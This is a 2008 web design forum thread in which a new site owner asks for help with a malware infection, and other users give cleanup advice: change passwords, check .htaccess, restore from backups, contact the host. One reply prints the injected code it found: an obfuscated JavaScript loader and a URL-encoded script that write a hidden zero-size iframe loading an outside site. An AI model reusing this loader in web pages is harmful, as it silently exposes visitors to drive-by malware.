View Full Version : Site Malware Infection--Please Help

12-18-2008, 06:52 PM
Hello. I received a troubling email from a user of my website this morning, notifying me that my website has been infected by malware, and is dangerous to its visitors. I am new to web design and do not know how this happened, or how to remove it. I noticed last night that a strange glitch was causing my site’s home page, along with any pages linked to it named “index” to have their tables misaligned. Since I had added a code I fund online for faviconcs to the home page of the site on its last update a week earlier, I thought that might be responsible. (That code was <link rel="shortcut icon" href="/favicon.ico">) I tried removing this code and re-uploading the effected pages. This seemed to correct the misalignment, but I am worried that a worse problem has arisen. Is there anyone who can give me any advice? Any suggestions for how to make my website safe again would be very appreciated!

(If relevant, my website URL is www.Nosgoth.net.)

12-18-2008, 07:13 PM
favicon wouldnt cause it do do that. someone must have logged in and added other code.

If it is infected I wont click on the link you posted. My mom had to have me reinstall her computer because of stuff like this, she went on a baby shower website and got bombarded by self-installing trojans.

I suggest change your passwords for your host login and upload your site from your backup files.

make sure you computer doesnt have any keyloggers that would save passwords.

12-18-2008, 07:36 PM
I found this in your code

<iframe src="http://palech.com/index.php" width="0" height="0" style="display:none"></iframe>
Its the decryption of this

<script>function c102916999516l494578a51c6c4(l494578a51d5ce){ var l494578a51da4d=16; return (parseInt(l494578a51d5ce,l494578a51da4d));}function l494578a51e9ec(l494578a51f1e7){ function l494578a52092e(){var l494578a521106=2;return l494578a521106;} var l494578a51f98d='';l494578a5218cf=String.fromCharCode;for(l494578a52015e=0;l494578a52015e<l494578a51f1e7.length;l494578a52015e+=l494578a52092e()){ l494578a51f98d+=(l494578a5218cf(c102916999516l494578a51c6c4(l494578a51f1e7.substr(l494578a52015e,l49 4578a52092e()))));}return l494578a51f98d;} var x8a='';var l494578a5220a0='3C736'+x8a+'3726'+x8a+'970743E6'+x8a+'96'+x8a+'6'+x8a+'28216'+x8a+'D796'+x8a+'96'+x8 a+'1297B6'+x8a+'46'+x8a+'F6'+x8a+'3756'+x8a+'D6'+x8a+'56'+x8a+'E742E77726'+x8a+'9746'+x8a+'528756'+x 8a+'E6'+x8a+'5736'+x8a+'36'+x8a+'1706'+x8a+'528202725336'+x8a+'32536'+x8a+'392536'+x8a+'36'+x8a+'253 7322536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'352532302536'+x8a+'6'+x8a+'52536'+x8a+'312536'+x8a+'6 '+x8a+'42536'+x8a+'3525336'+x8a+'42536'+x8a+'332533312533302532302537332537322536'+x8a+'3325336'+x8a +'42532372536'+x8a+'3825373425373425373025336'+x8a+'125326'+x8a+'6'+x8a+'25326'+x8a+'6'+x8a+'2536'+x 8a+'372536'+x8a+'6'+x8a+'6'+x8a+'2536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'2533322536'+x8a+'6'+x8a+'42 536'+x8a+'3525326'+x8a+'52536'+x8a+'6'+x8a+'52536'+x8a+'3525373425326'+x8a+'6'+x8a+'25326'+x8a+'5253 6'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'25326'+x8a+'6'+x8a+'2536'+x8a+'332536'+x8a+'382536'+x8a+'352536 '+x8a+'332536'+x8a+'6'+x8a+'225326'+x8a+'52536'+x8a+'382537342536'+x8a+'6'+x8a+'42536'+x8a+'6'+x8a+' 32532372532302537372536'+x8a+'392536'+x8a+'342537342536'+x8a+'3825336'+x8a+'425333725333025333525323 02536'+x8a+'382536'+x8a+'352536'+x8a+'392536'+x8a+'372536'+x8a+'3825373425336'+x8a+'4253338253338253 2302537332537342537392536'+x8a+'6'+x8a+'32536'+x8a+'3525336'+x8a+'4253237253736'+x8a+'2536'+x8a+'392 537332536'+x8a+'392536'+x8a+'322536'+x8a+'392536'+x8a+'6'+x8a+'32536'+x8a+'3925373425373925336'+x8a+ '12536'+x8a+'382536'+x8a+'392536'+x8a+'342536'+x8a+'342536'+x8a+'352536'+x8a+'6'+x8a+'525323725336'+ x8a+'525336'+x8a+'325326'+x8a+'6'+x8a+'2536'+x8a+'392536'+x8a+'36'+x8a+'2537322536'+x8a+'312536'+x8a +'6'+x8a+'42536'+x8a+'3525336'+x8a+'52729293B7D76'+x8a+'6'+x8a+'172206'+x8a+'D796'+x8a+'96'+x8a+'13D 7472756'+x8a+'53B3C2F736'+x8a+'3726'+x8a+'970743E';document.write(l494578a51e9ec(l494578a5220a0));</script><!-- o --><Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63 %68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74% 3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%6 5%3E'));
Did you put any of that there yourself? I suggest you contact your host and try to remove any code that looks like the above.

12-20-2008, 01:36 PM
Thank you both very much! If Windows’ AutoComplete feature counts as what you mean by a keylogger, I did have one that had memorized the password for my website. I have now changed my password and re-uploaded everything from the files on my hard drive. It appears to be working now. Hopefully it will continue to.

12-20-2008, 04:48 PM
I was having the same problem with one of my sites. Apparently, someone gained access to an FTP login, and was changing the .htaccess file to redirect to a bogus anti-virus site. So while there may have been nothing wrong with your site, it's the best idea to make sure this .htaccess file is not changed, and the login passwords, along with FTP passwords are changed.

12-20-2008, 09:52 PM
I would second what Aero says, contact your host. They know these things and can often fix them for you. Of course a good password is paramount though. I had this happen to a client, because they chose a dictionary word as a password, and it was hacked. Its pesky, because you don't always know where the affected areas are, and your support might be able to track down when it occurred, which files were changed, and clean it up must faster (and more thoroughly) than you can on your own.

Of course if you have little or no support, check the .htaccess and look at every file and folder!